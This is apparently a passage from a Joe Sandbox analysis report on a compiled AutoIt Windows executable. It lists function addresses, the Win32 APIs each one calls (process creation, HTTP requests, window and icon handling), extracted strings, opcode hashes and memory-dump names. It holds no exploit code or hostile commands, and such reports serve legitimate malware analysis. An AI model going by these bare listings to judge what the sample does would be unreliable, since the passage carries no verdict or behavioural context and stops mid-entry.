                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EC83F2
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EC5BF2), ref: 00EC844E
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EC8487
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EC84CA
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EC8501
                                                      • FreeLibrary.KERNEL32(?), ref: 00EC850D
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EC851D
                                                      • DestroyIcon.USER32(?,?,?,?,?,00EC5BF2), ref: 00EC852C
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EC8549
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EC8555
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 799131459-1154884017
                                                      • Opcode ID: 44cc33ec8f6041beb6d30765661810f29551d03cbe06c29e41ffd0dba3bb9e1c
                                                      • Instruction ID: 4539bc7ac40e49e5d83d909e2322a819f141f902e6b1fe1fc8f814b3b0868705
                                                      • Opcode Fuzzy Hash: 44cc33ec8f6041beb6d30765661810f29551d03cbe06c29e41ffd0dba3bb9e1c
                                                      • Instruction Fuzzy Hash: 20611171500219BEEB18DF64CE41FFE77A8BB04711F10651AF815F60D1DBB2AA96CBA0
                                                      Function 00E37778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 0-1645009161
                                                      • Opcode ID: 2a3d500d08ed928b35dc68e5892a93020a3a449d956b17d3dcd223cb868eb332
                                                      • Instruction ID: 0e73392de3e08a7fb13f8d3d090ba6d6eab4a31a2a82c3b9064dd7d62c8c0a3d
                                                      • Opcode Fuzzy Hash: 2a3d500d08ed928b35dc68e5892a93020a3a449d956b17d3dcd223cb868eb332
                                                      • Instruction Fuzzy Hash: 528105B1A04605BBDB20AF60DD47FAE7BF8AF14301F046425FD48BA292EBB1D915C791
                                                      Function 00E95A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00E95A2E
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E95A40
                                                      • SetWindowTextW.USER32(?,?), ref: 00E95A57
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00E95A6C
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00E95A72
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E95A82
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00E95A88
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E95AA9
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E95AC3
                                                      • GetWindowRect.USER32(?,?), ref: 00E95ACC
                                                      • _wcslen.LIBCMT ref: 00E95B33
                                                      • SetWindowTextW.USER32(?,?), ref: 00E95B6F
                                                      • GetDesktopWindow.USER32 ref: 00E95B75
                                                      • GetWindowRect.USER32(00000000), ref: 00E95B7C
                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E95BD3
                                                      • GetClientRect.USER32(?,?), ref: 00E95BE0
                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E95C05
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E95C2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                      • String ID:
                                                      • API String ID: 895679908-0
                                                      • Opcode ID: 6bf89664de7711720181112e02ea5f309b340f20b6205603324263280c91f9ff
                                                      • Instruction ID: 39215ee6d4f758e7f02cdde90bedcf3452d0d47cbea915b1f1cddb8eb016a7b3
                                                      • Opcode Fuzzy Hash: 6bf89664de7711720181112e02ea5f309b340f20b6205603324263280c91f9ff
                                                      • Instruction Fuzzy Hash: C7717C32900B09AFDB21DFA9CE85EAEBBF5FF48704F105528E586B25A0D771E945CB10
                                                      Function 00E930F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                                      • API String ID: 176396367-1901692981
                                                      • Opcode ID: 7130fb47551bb32e1180c195bb41c98b7df38b0240cb24c0be0688515ec7fdcc
                                                      • Instruction ID: 92bdf52335005916f4dc3de45ad7711f490382b04c9a0fe371ab81016dd04f5f
                                                      • Opcode Fuzzy Hash: 7130fb47551bb32e1180c195bb41c98b7df38b0240cb24c0be0688515ec7fdcc
                                                      • Instruction Fuzzy Hash: 31E1E532A00616ABCF18DFB8C4416FDFBB0BF54714F55A129E966B7250DB30AE85C790
                                                      Function 00E500C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E500C6
                                                        • Part of subcall function 00E500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00F0070C,00000FA0,07B10558,?,?,?,?,00E723B3,000000FF), ref: 00E5011C
                                                        • Part of subcall function 00E500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E723B3,000000FF), ref: 00E50127
                                                        • Part of subcall function 00E500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E723B3,000000FF), ref: 00E50138
                                                        • Part of subcall function 00E500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E5014E
                                                        • Part of subcall function 00E500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E5015C
                                                        • Part of subcall function 00E500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E5016A
                                                        • Part of subcall function 00E500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E50195
                                                        • Part of subcall function 00E500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E501A0
                                                      • ___scrt_fastfail.LIBCMT ref: 00E500E7
                                                        • Part of subcall function 00E500A3: __onexit.LIBCMT ref: 00E500A9
                                                      Strings
                                                      • SleepConditionVariableCS, xrefs: 00E50154
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E50122
                                                      • InitializeConditionVariable, xrefs: 00E50148
                                                      • WakeAllConditionVariable, xrefs: 00E50162
                                                      • kernel32.dll, xrefs: 00E50133
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 66158676-1714406822
                                                      • Opcode ID: 0f3a2de34a3d90437e6621b4e7d1b386e49ec54ccf7e697b9367d7f397252c2e
                                                      • Instruction ID: 110117aa52646143e0cf3df790033edbc9d56ac3a41aa263dffea3ccdc3834be
                                                      • Opcode Fuzzy Hash: 0f3a2de34a3d90437e6621b4e7d1b386e49ec54ccf7e697b9367d7f397252c2e
                                                      • Instruction Fuzzy Hash: 22216B32A427016FD7105B65AE05F6A37E4EB04F62F141939FC05F32D1DF759C098A92
                                                      Function 00EA44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(00000000,00000000,00ECCC08), ref: 00EA4527
                                                      • _wcslen.LIBCMT ref: 00EA453B
                                                      • _wcslen.LIBCMT ref: 00EA4599
                                                      • _wcslen.LIBCMT ref: 00EA45F4
                                                      • _wcslen.LIBCMT ref: 00EA463F
                                                      • _wcslen.LIBCMT ref: 00EA46A7
                                                        • Part of subcall function 00E4F9F2: _wcslen.LIBCMT ref: 00E4F9FD
                                                      • GetDriveTypeW.KERNEL32(?,00EF6BF0,00000061), ref: 00EA4743
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2055661098-1000479233
                                                      • Opcode ID: e6dd261aa2cb7cea232a9b85a28802ae1a612d69bd6805f04e0cad414dd64268
                                                      • Instruction ID: ad6f6ad3020149fa2341df4b2d31180288bf16216d9505749a63875972e998ac
                                                      • Opcode Fuzzy Hash: e6dd261aa2cb7cea232a9b85a28802ae1a612d69bd6805f04e0cad414dd64268
                                                      • Instruction Fuzzy Hash: DDB125B16083029FC714DF28C891A7AB7E4AFDA714F10691DF496EB2D1D7B0E944CB52
                                                      Function 00EBAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00EBB198
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBB1B0
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBB1D4
                                                      • _wcslen.LIBCMT ref: 00EBB200
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBB214
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBB236
                                                      • _wcslen.LIBCMT ref: 00EBB332
                                                        • Part of subcall function 00EA05A7: GetStdHandle.KERNEL32(000000F6), ref: 00EA05C6
                                                      • _wcslen.LIBCMT ref: 00EBB34B
                                                      • _wcslen.LIBCMT ref: 00EBB366
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EBB3B6
                                                      • GetLastError.KERNEL32(00000000), ref: 00EBB407
                                                      • CloseHandle.KERNEL32(?), ref: 00EBB439
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBB44A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBB45C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBB46E
                                                      • CloseHandle.KERNEL32(?), ref: 00EBB4E3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 2178637699-0
                                                      • Opcode ID: 576cb2ee96b1c456eb2a1575b92759ce6e6ffeae1caeb14f25644867d4efdb61
                                                      • Instruction ID: 75bdeafe496d90f943920e6dea17726974e56082258a200b630d87485b630e85
                                                      • Opcode Fuzzy Hash: 576cb2ee96b1c456eb2a1575b92759ce6e6ffeae1caeb14f25644867d4efdb61
                                                      • Instruction Fuzzy Hash: 62F1AD715043009FC724EF24C895BAFBBE5AF85314F14A45DF899AB2A2DB71EC44CB52
                                                      Function 00E3326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemCount.USER32(00F01990), ref: 00E72F8D
                                                      • GetMenuItemCount.USER32(00F01990), ref: 00E7303D
                                                      • GetCursorPos.USER32(?), ref: 00E73081
                                                      • SetForegroundWindow.USER32(00000000), ref: 00E7308A
                                                      • TrackPopupMenuEx.USER32(00F01990,00000000,?,00000000,00000000,00000000), ref: 00E7309D
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E730A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                      • String ID: 0
                                                      • API String ID: 36266755-4108050209
                                                      • Opcode ID: 117ccdf68d5d9ed199f091bc46da42949ad2d2602aaf71e358d48169acaa1cdf
                                                      • Instruction ID: c701f89652d27bbbaf83e597de90b2afe7e8e1cba04b8ddd0002c5dc4eb4c0c1
                                                      • Opcode Fuzzy Hash: 117ccdf68d5d9ed199f091bc46da42949ad2d2602aaf71e358d48169acaa1cdf
                                                      • Instruction Fuzzy Hash: 64711930644205BFEB258F35DC49F9ABF68FF04328F20921AF6187A1E0C7B1A914D750
                                                      Function 00EC6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00EC6DEB
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EC6E5F
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EC6E81
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC6E94
                                                      • DestroyWindow.USER32(?), ref: 00EC6EB5
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E30000,00000000), ref: 00EC6EE4
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC6EFD
                                                      • GetDesktopWindow.USER32 ref: 00EC6F16
                                                      • GetWindowRect.USER32(00000000), ref: 00EC6F1D
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EC6F35
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EC6F4D
                                                        • Part of subcall function 00E49944: GetWindowLongW.USER32(?,000000EB), ref: 00E49952
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 2429346358-3619404913
                                                      • Opcode ID: 703c5c0303f7c7171af5fd4326a6c55148ce3dc34f2cd673e95a5e5203356d46
                                                      • Instruction ID: 76628da7e72dd17a4391b3ed97074e8c335bb41a1788b73164f250f71e7b2616
                                                      • Opcode Fuzzy Hash: 703c5c0303f7c7171af5fd4326a6c55148ce3dc34f2cd673e95a5e5203356d46
                                                      • Instruction Fuzzy Hash: 39715B74104244AFDB21CF18DD44FABBBE9FF89708F14141EF999A7261C772A906DB12
                                                      Function 00EC911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • DragQueryPoint.SHELL32(?,?), ref: 00EC9147
                                                        • Part of subcall function 00EC7674: ClientToScreen.USER32(?,?), ref: 00EC769A
                                                        • Part of subcall function 00EC7674: GetWindowRect.USER32(?,?), ref: 00EC7710
                                                        • Part of subcall function 00EC7674: PtInRect.USER32(?,?,00EC8B89), ref: 00EC7720
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC91B0
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EC91BB
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EC91DE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EC9225
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC923E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EC9255
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EC9277
                                                      • DragFinish.SHELL32(?), ref: 00EC927E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EC9371
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 221274066-3440237614
                                                      • Opcode ID: 83fd8c1e28c9e150f48555e005e9ae266a8e0cf8c4314a07a886239ef814a7ee
                                                      • Instruction ID: 98a37ea2fc822ba7b8a74d738937db3ce4ad3af119f7ff53b5752f58d0948c57
                                                      • Opcode Fuzzy Hash: 83fd8c1e28c9e150f48555e005e9ae266a8e0cf8c4314a07a886239ef814a7ee
                                                      • Instruction Fuzzy Hash: BF618B71108300AFC705DF64DD89EAFBBE8FF88750F10192EF595A21A1DB719A4ACB52
                                                      Function 00EAC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EAC4B0
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EAC4C3
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EAC4D7
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EAC4F0
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EAC533
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EAC549
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EAC554
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EAC584
                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EAC5DC
                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EAC5F0
                                                      • InternetCloseHandle.WININET(00000000), ref: 00EAC5FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                      • String ID:
                                                      • API String ID: 3800310941-3916222277
                                                      • Opcode ID: e8f0c253058cc2ecf11b24d2d763b69620d94418dd1b42ccc23616c7dde0c3b7
                                                      • Instruction ID: 2973e8e3564c8e56726025f48bb29cea13f974d3d6bfad4e4f21b2d264f6026a
                                                      • Opcode Fuzzy Hash: e8f0c253058cc2ecf11b24d2d763b69620d94418dd1b42ccc23616c7dde0c3b7
                                                      • Instruction Fuzzy Hash: C5515EB0500604BFDB218F65C948EAB7BFCFF09748F20542AF949AA610DB31F949DB60
                                                      Function 00EC856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00EC8592
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85A2
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85AD
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85BA
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EC85C8
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85D7
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EC85E0
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85E7
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00EC85F8
                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00ECFC38,?), ref: 00EC8611
                                                      • GlobalFree.KERNEL32(00000000), ref: 00EC8621
                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00EC8641
                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00EC8671
                                                      • DeleteObject.GDI32(?), ref: 00EC8699
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EC86AF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
